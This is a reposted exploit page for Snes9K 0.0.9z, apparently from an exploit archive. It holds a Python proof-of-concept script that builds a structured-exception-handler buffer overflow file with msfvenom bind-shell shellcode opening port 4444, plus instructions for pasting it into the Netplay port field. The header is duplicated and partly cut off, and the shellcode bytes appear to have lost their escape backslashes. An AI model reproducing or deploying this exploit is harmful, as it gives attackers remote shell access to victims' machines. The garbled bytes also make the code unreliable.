Snes9K 0.0.9z Buffer Overflow

Details
Category: Vulnerabilities
Hits: 410
# Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah AlA+-ASS
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software # Exploit Title: Snes9K 0.0.9z - Buffer Overflow (SEH)
# Date: 2018-10-13
# Exploit Author: Abdullah AlA+-ASS
# Vendor Homepage: https://sourceforge.net/projects/snes9k/
# Software Link: https://sourceforge.net/projects/snes9k/files/latest/download
# Version: 0.0.9z
# Tested on: Windows XP Professional sp3(ENG)
# Category: Windows Local Exploit
# How to use: open the program go to "Netplay --> Options" paste the contents of boom.txt
# in Socket Port Number --> Connect victim machine on port 4444
#!/usr/bin/python

#msfvenom -p windows/shell_bind_tcp -b "x00x0ax0dx9fx8fx8ex8dx9ex9dxd0xddxfdxfexf0xde" -f python
#352 bytes
buf = ""
buf += "x2bxc9x83xe9xaexe8xffxffxffxffxc0x5ex81"
buf += "x76x0ex43x2bx2ax41x83xeexfcxe2xf4xbfxc3"
buf += "xa8x41x43x2bx4axc8xa6x1axeax25xc8x7bx1a"
buf += "xcax11x27xa1x13x57xa0x58x69x4cx9cx60x67"
buf += "x72xd4x86x7dx22x57x28x6dx63xeaxe5x4cx42"
buf += "xecxc8xb3x11x7cxa1x13x53xa0x60x7dxc8x67"
buf += "x3bx39xa0x63x2bx90x12xa0x73x61x42xf8xa1"
buf += "x08x5bxc8x10x08xc8x1fxa1x40x95x1axd5xed"
buf += "x82xe4x27x40x84x13xcax34xb5x28x57xb9x78"
buf += "x56x0ex34xa7x73xa1x19x67x2axf9x27xc8x27"
buf += "x61xcax1bx37x2bx92xc8x2fxa1x40x93xa2x6e"
buf += "x65x67x70x71x20x1ax71x7bxbexa3x74x75x1b"
buf += "xc8x39xc1xccx1ex43x19x73x43x2bx42x36x30"
buf += "x19x75x15x2bx67x5dx67x44xd4xffxf9xd3x2a"
buf += "x2ax41x6axefx7ex11x2bx02xaax2ax43xd4xff"
buf += "x2bx4bx72x7axa3xbex6bx7ax01x13x43xc0x4e"
buf += "x9cxcbxd5x94xd4x43x28x41x52x77xa3xa7x29"
buf += "x3bx7cx16x2bxe9xf1x76x24xd4xffx16x2bx9c"
buf += "xc3x79xbcxd4xffx16x2bx5fxc6x7axa2xd4xff"
buf += "x16xd4x43x5fx2fx0ex4axd5x94x2bx48x47x25"
buf += "x43xa2xc9x16x14x7cx1bxb7x29x39x73x17xa1"
buf += "xd6x4cx86x07x0fx16x40x42xa6x6ex65x53xed"
buf += "x2ax05x17x7bx7cx17x15x6dx7cx0fx15x7dx79"
buf += "x17x2bx52xe6x7exc5xd4xffxc8xa3x65x7cx07"
buf += "xbcx1bx42x49xc4x36x4axbex96x90xdaxf4xe1"
buf += "x7dx42xe7xd6x96xb7xbex96x17x2cx3dx49xab"
buf += "xd1xa1x36x2ex91x06x50x59x45x2bx43x78xd5"
buf += "x94"

nseh= "xebx06x90x90"
seh = "x39x1fxd1x72" #POP-POP-RET msacm32.drv

buffer = "x90" * 244 + nseh + seh + buf + "x90"*20

payload = buffer
try:
f=open("boom.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"